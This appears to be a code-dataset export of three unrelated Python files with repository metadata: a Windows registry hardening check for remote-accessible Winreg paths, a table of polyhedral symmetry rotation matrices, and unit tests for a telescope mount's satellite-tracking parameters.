937c3b365cdc5ac69b78f59070be0a21bdb53db0
|
[
"MIT"
] | null | null | null |
pcat2py/class/21064964-5cc5-11e4-af55-00155d01fe08.py
|
phnomcobra/PCAT2PY
|
937c3b365cdc5ac69b78f59070be0a21bdb53db0
|
[
"MIT"
] | null | null | null |
pcat2py/class/21064964-5cc5-11e4-af55-00155d01fe08.py
|
phnomcobra/PCAT2PY
|
937c3b365cdc5ac69b78f59070be0a21bdb53db0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
################################################################################
# 21064964-5cc5-11e4-af55-00155d01fe08
#
# Justin Dierking
# justindierking@hardbitsolutions.com
# phnomcobra@gmail.com
#
# 10/24/2014 Original Construction
################################################################################
class Finding:
    """Benchmark finding 21064964-5cc5-11e4-af55-00155d01fe08.

    Checks that the remotely accessible registry paths
    (SecurePipeServers\\Winreg\\AllowedPaths, value 'Machine') contain only
    the recommended entries, and remediates them via PowerShell.
    """

    # Recommended AllowedPaths entries. Joined with ',' this reproduces the
    # benchmark's reference MultiSZ string exactly. Raw strings are required:
    # the original single non-raw literal contained '\U' (in
    # 'Terminal Server\UserConfig'), which is an invalid \UXXXXXXXX escape
    # and a SyntaxError on Python 3.
    _RECOMMENDED_PATHS = (
        r"Software\Microsoft\OLAP Server",
        r"Software\Microsoft\Windows NT\CurrentVersion\Perflib",
        r"Software\Microsoft\Windows NT\CurrentVersion\Print",
        r"Software\Microsoft\Windows NT\CurrentVersion\Windows",
        r"System\CurrentControlSet\Control\ContentIndex",
        r"System\CurrentControlSet\Control\Print\Printers",
        r"System\CurrentControlSet\Control\Terminal Server",
        r"System\CurrentControlSet\Control\Terminal Server\UserConfig",
        r"System\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration",
        r"System\CurrentControlSet\Services\Eventlog",
        r"System\CurrentControlSet\Services\Sysmonlog",
    )

    def __init__(self):
        # Lines reported to the operator for this finding.
        self.output = []
        # Compliance verdict; recomputed by check().
        self.is_compliant = False
        # Benchmark rule identifier.
        self.uuid = "21064964-5cc5-11e4-af55-00155d01fe08"

    def check(self, cli):
        """Return True when every current AllowedPaths entry appears in the
        recommended list; records the raw values in self.output.

        cli: registry/shell adapter providing get_reg_multi_sz(key, name).
        """
        # Assume compliant until an unexpected entry is found.
        self.is_compliant = True

        key = r'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths'
        multi_sz = cli.get_reg_multi_sz(key, 'Machine')

        # Output lines shown for this finding.
        self.output = [key, 'Machine='] + multi_sz

        # Case-insensitive *substring* test against the comma-joined
        # reference string — deliberately preserves the original benchmark's
        # permissive semantics (any entry occurring anywhere in the
        # reference text passes).
        recommended = ",".join(self._RECOMMENDED_PATHS).lower()
        for sz in multi_sz:
            if sz.lower() not in recommended:
                self.is_compliant = False

        return self.is_compliant

    def fix(self, cli):
        """Create the Winreg\\AllowedPaths key and set the recommended
        'Machine' MultiString value via PowerShell."""
        cli.powershell(r"New-Item -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers'")
        cli.powershell(r"New-Item -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg'")
        cli.powershell(r"New-Item -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths'")
        # NOTE(review): the -value list is passed unquoted, exactly as in
        # the original benchmark; paths containing spaces ('Terminal
        # Server') rely on PowerShell's parsing of the bare argument —
        # confirm behavior on a target host before changing it.
        cli.powershell(
            r"Set-ItemProperty -path 'HKLM:\System\CurrentControlSet\Control\SecurePipeServers\Winreg\AllowedPaths'"
            r" -name 'Machine' -Type MultiString -value "
            + ",".join(self._RECOMMENDED_PATHS))
| 64.904762
| 721
| 0.74358
| 280
| 2,726
| 7.175
| 0.310714
| 0.22897
| 0.238925
| 0.101543
| 0.764062
| 0.732205
| 0.732205
| 0.732205
| 0.689895
| 0.61324
| 0
| 0.022811
| 0.099413
| 2,726
| 41
| 722
| 66.487805
| 0.795519
| 0.086574
| 0
| 0.105263
| 0
| 0.105263
| 0.730802
| 0.670837
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
7f0bc5cd58b733a7d68f070b7eeaefdd1a84b095
| 30,456
|
py
|
Python
|
homog/sym.py
|
bcov77/homog
|
526c3f07c720f76333bc8be0cd64b436015ff509
|
[
"Apache-2.0"
] | null | null | null |
homog/sym.py
|
bcov77/homog
|
526c3f07c720f76333bc8be0cd64b436015ff509
|
[
"Apache-2.0"
] | 104
|
2018-02-02T00:54:14.000Z
|
2022-03-28T11:20:24.000Z
|
homog/sym.py
|
bcov77/homog
|
526c3f07c720f76333bc8be0cd64b436015ff509
|
[
"Apache-2.0"
] | 5
|
2018-02-01T20:34:36.000Z
|
2021-06-22T17:59:30.000Z
|
from homog import *
tetrahedral_axes = {2: hnormalized([1, 0, 0]),
3: hnormalized([1, 1, 1]),
7: hnormalized([1, 1, -1])} # other c3
octahedral_axes = {2: hnormalized([1, 1, 0]),
3: hnormalized([1, 1, 1]),
4: hnormalized([1, 0, 0])}
icosahedral_axes = {2: hnormalized([1, 0, 0]),
3: hnormalized([0.934172, 0.000000, 0.356822]),
5: hnormalized([0.850651, 0.525731, 0.000000])}
tetrahedral_frames = np.array([((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(-0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, -0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, -1.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000))])
octahedral_frames = np.array([((+0.000000, +1.000000, +0.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, +1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, +1.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, -0.000000, +0.000000),
(+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, -1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, -0.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, -0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.000000, +0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, -1.000000, +0.000000),
(-0.000000, -1.000000, -0.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, +0.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(-0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, -0.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000))])
icosahedral_frames = np.array([((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, +0.000000, +0.000000),
(+0.000000, -0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +1.000000, +0.000000, +0.000000),
(-0.000000, +0.000000, -1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, +1.000000, +0.000000),
(+1.000000, -0.000000, -0.000000, +0.000000),
(+0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, +0.000000, +0.000000, +0.000000),
(-0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -1.000000, +0.000000, +0.000000),
(-0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, -1.000000, +0.000000),
(+1.000000, +0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, +0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((+0.000000, -0.000000, -1.000000, +0.000000),
(-1.000000, -0.000000, -0.000000, +0.000000),
(-0.000000, +1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, +0.000000, +0.000000),
(+0.000000, -1.000000, -0.000000, +0.000000),
(+0.000000, +0.000000, +1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-1.000000, -0.000000, +0.000000, +0.000000),
(-0.000000, +1.000000, +0.000000, +0.000000),
(-0.000000, -0.000000, -1.000000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(-0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(+0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(+0.309017, -0.500000, +0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(-0.309017, +0.500000, -0.809017, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, +0.809017, +0.000000),
(+0.500000, +0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, +0.809017, +0.000000),
(-0.500000, -0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, -0.809017, +0.000000),
(+0.500000, +0.809017, +0.309017, +0.000000),
(+0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, +0.500000, -0.809017, +0.000000),
(-0.500000, -0.809017, -0.309017, +0.000000),
(-0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, +0.809017, +0.000000),
(+0.500000, -0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, +0.809017, +0.000000),
(-0.500000, +0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, -0.809017, +0.000000),
(+0.500000, -0.809017, +0.309017, +0.000000),
(-0.809017, -0.309017, +0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000)),
((-0.309017, -0.500000, -0.809017, +0.000000),
(-0.500000, +0.809017, -0.309017, +0.000000),
(+0.809017, +0.309017, -0.500000, +0.000000),
(+0.000000, +0.000000, +0.000000, +1.000000))])
| 75.950125
| 79
| 0.363344
| 3,146
| 30,456
| 3.515575
| 0.0089
| 0.548101
| 0.845118
| 0.688608
| 0.981826
| 0.981826
| 0.980109
| 0.980109
| 0.974503
| 0.974503
| 0
| 0.646809
| 0.450486
| 30,456
| 400
| 80
| 76.14
| 0.014042
| 0.000263
| 0
| 0.956853
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.002538
| 0
| 0.002538
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
6152b27defe38f299427b452e534a59d9f96cfe9
| 50,600
|
py
|
Python
|
tests/unit_tests/mountcontrol/test_satellite.py
|
mworion/MountWizzard4
|
4e06b29ec2ef70be40e114b911b7bdf2f858a4b1
|
[
"Apache-2.0"
] | 16
|
2020-01-11T22:32:26.000Z
|
2022-03-31T15:18:14.000Z
|
tests/unit_tests/mountcontrol/test_satellite.py
|
mworion/MountWizzard4
|
4e06b29ec2ef70be40e114b911b7bdf2f858a4b1
|
[
"Apache-2.0"
] | 196
|
2020-01-16T13:56:01.000Z
|
2022-03-29T02:06:51.000Z
|
tests/unit_tests/mountcontrol/test_satellite.py
|
mworion/MountWizzard4
|
4e06b29ec2ef70be40e114b911b7bdf2f858a4b1
|
[
"Apache-2.0"
] | 6
|
2019-12-01T19:39:33.000Z
|
2021-05-27T13:14:20.000Z
|
############################################################
# -*- coding: utf-8 -*-
#
# # # # # # #
# ## ## # ## # #
# # # # # # # # # # #
# # ## # ## ## ######
# # # # # # #
#
# Python-based Tool for interaction with the 10micron mounts
# GUI with PyQT5 for python
#
# written in python3, (c) 2019-2021 by mworion
# Licence APL2.0
#
###########################################################
# standard libraries
import unittest
import unittest.mock as mock
# external packages
from skyfield.api import Angle, load
# local imports
from mountcontrol.satellite import Satellite, TLEParams, TrajectoryParams
from mountcontrol.connection import Connection
from base.loggerMW import setupLogging
setupLogging()
class TestConfigData(unittest.TestCase):
def setUp(self):
pass
def test_azimuth_1(self):
tleParams = TLEParams()
tleParams.azimuth = 10
assert tleParams.azimuth.degrees == 10
def test_azimuth_2(self):
tleParams = TLEParams()
tleParams.azimuth = Angle(degrees=10)
assert tleParams.azimuth.degrees == 10
def test_altitude_1(self):
tleParams = TLEParams()
tleParams.altitude = 10
assert tleParams.altitude.degrees == 10
def test_altitude_2(self):
tleParams = TLEParams()
tleParams.altitude = Angle(degrees=10)
assert tleParams.altitude.degrees == 10
def test_ra_1(self):
tleParams = TLEParams()
tleParams.ra = 10
assert tleParams.ra.hours == 10
def test_ra_2(self):
tleParams = TLEParams()
tleParams.ra = Angle(hours=10)
assert tleParams.ra.hours == 10
def test_dec_1(self):
tleParams = TLEParams()
tleParams.dec = 10
assert tleParams.dec.degrees == 10
def test_dec_2(self):
tleParams = TLEParams()
tleParams.dec = Angle(degrees=10)
assert tleParams.dec.degrees == 10
def test_flip_1(self):
tleParams = TLEParams()
tleParams.flip = True
assert tleParams.flip
def test_flip_2(self):
tleParams = TLEParams()
tleParams.flip = 'F'
assert tleParams.flip
def test_jdStart_1(self):
tleParams = TLEParams()
tleParams.jdStart = None
assert tleParams.jdStart is None
def test_jdStart_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
tleParams = TLEParams(obsSite=ObsSite())
tleParams.jdStart = '100'
assert tleParams.jdStart.tt == 169
def test_jdEnd_1(self):
tleParams = TLEParams()
tleParams.jdEnd = None
assert tleParams.jdEnd is None
def test_jdEnd_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
tleParams = TLEParams(obsSite=ObsSite())
tleParams.jdEnd = '100'
assert tleParams.jdEnd.tt == 169
def test_message_1(self):
tleParams = TLEParams()
tleParams.message = None
assert tleParams.message is None
def test_message_2(self):
tleParams = TLEParams()
tleParams.message = 'test'
assert tleParams.message == 'test'
